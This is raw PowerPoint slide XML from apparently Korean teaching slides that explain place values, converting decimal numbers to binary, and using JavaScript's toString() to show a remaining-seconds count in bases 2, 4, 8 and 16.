        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4983276" y="2349881"/>
            <a:ext cx="446015" cy="6234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94D0B6A0-04FD-4173-AB7C-08189FFEBB72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2286000" y="3200545"/>
            <a:ext cx="45640" cy="3473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2" descr="A tech walkthrough of metal gate I/O transistors(3)">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA1AD486-1CFE-4D12-AEF8-275E1FAC53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78006" y="2324145"/>
            <a:ext cx="2586672" cy="1826190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="그림 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{108A071A-CAEA-451A-9968-3FBE806DB353}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6756810" y="4150335"/>
            <a:ext cx="5003045" cy="2306466"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2956635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5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p:bldP spid="21" grpId="0"/>
      <p:bldP spid="22"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양수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C 언어 코딩 도장: 36.9 배열을 활용하여 10진수를 2진수로 변환하기">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53D9718F-035F-4889-91F3-E2C2C55254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6427" y="2363343"/>
            <a:ext cx="5607150" cy="3094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15030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87E3274D-1B65-4BEE-B181-1C4011C39B51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639568" y="2109216"/>
            <a:ext cx="7370064" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>132</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>4  (10) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 1000 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 100 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 10 + 4 * 1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF3F50D9-455D-47B7-A559-C99BE2ADA1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2755392" y="2478548"/>
            <a:ext cx="7370064" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>132 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> (10) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 100   + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 10  + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 1 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E42E42-3E4B-4567-AC5C-75B17D2EC170}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639568" y="3032546"/>
            <a:ext cx="7370064" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>132</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>4 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>132</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 10 + 4</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C7758AB-604C-4974-B7A0-EF63BFA9C7F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639568" y="3640789"/>
            <a:ext cx="7370064" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>1  (2) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 8 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 4 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 2 + 1 * 1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9750EAFF-2D35-45D4-A521-E350023D6161}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2767584" y="4010121"/>
            <a:ext cx="7370064" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>110 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> (2) = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 4 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 2 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 1 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF9CFC94-5A14-40BD-9076-150E1E88D159}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639568" y="4564119"/>
            <a:ext cx="7370064" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>1 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> * 2 + 1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="직선 화살표 연결선 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3E253C8-FEE4-414F-B183-C27EE0BC841F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2936759" y="4933451"/>
            <a:ext cx="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8F39380-F8D4-400C-A246-A947094C4C32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2278379" y="5447310"/>
            <a:ext cx="2953146" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>     13    =  6*2 +1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="직사각형 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B40967FA-D68D-451D-A1CC-B3E2F609FDFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639568" y="4564119"/>
            <a:ext cx="627200" cy="3693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2A3D4518-B158-4E3D-ADEB-049F551C7DE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3534992" y="4564119"/>
            <a:ext cx="439921" cy="3693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8" name="직선 화살표 연결선 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1C4F32D-5AAD-49E6-B52A-77C9A26E2D5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="27" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3754952" y="4933451"/>
            <a:ext cx="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7" name="직선 연결선 1026">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{264AC1A1-71BB-42F4-A54D-F1DC9AA44D49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="0" y="3401878"/>
            <a:ext cx="12177027" cy="136164"/>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B5A81AB-DD64-47D1-A527-CD4509663207}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="996902" y="6113661"/>
            <a:ext cx="8765223" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>     13 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>진법으로 표현하려면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>,  6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>진법으로 표현한후 뒤에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>을 추가하면 된다</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="TextBox 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C2104A4-D2CA-4F17-99E5-3BBEFD1B38C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4068727" y="1662011"/>
            <a:ext cx="3544186" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>각 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>자리수에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 대한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가치</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 보자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="257454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animBg="1"/>
      <p:bldP spid="27" grpId="0" animBg="1"/>
      <p:bldP spid="37"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눈이 감기는 걸 보니 졸업이 얼마 남지 않았구나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 과연 몇 초가 남았을까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초를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>2, 4, 8,16 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>진수로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자바스크립트는 변수를 나타낼 때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>이란 문법을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어떻게 쓰는 것인지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google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검색하여 찾는다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자바스크립트의 변수 선언</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87479872-17A0-4CBD-B7DC-818B95F4DA27}"/>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ED2DB2A8-77EA-4799-8C20-F172FBEE034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BE10B517-1824-49D2-A502-9D13A34381B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A2AB9B6-A04C-4BD7-AEFB-CFCC66A19B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6CCD3A6D-36CA-4D72-A5E1-878F8D46F3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297159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096000" y="369000"/>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답은 아래와 같다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66E4D11-808F-4C1C-BB74-08512BD03F20}"/>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남은 시간을 변수로 입력한다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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>remain_time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>함수를 이용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>진수 표현 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="그림 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10AD4106-2BCF-4235-9F30-ED5FB6008042}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="587829" y="743184"/>
            <a:ext cx="5208698" cy="1356522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="그림 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87E23B58-B828-47D7-8895-C1D458FC7032}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="587830" y="2543051"/>
            <a:ext cx="5208698" cy="1676363"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="그림 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA78ABBC-DF00-4F17-A1CB-2A3BA2B364C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6204621" y="774605"/>
            <a:ext cx="5255067" cy="2450056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="그룹 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
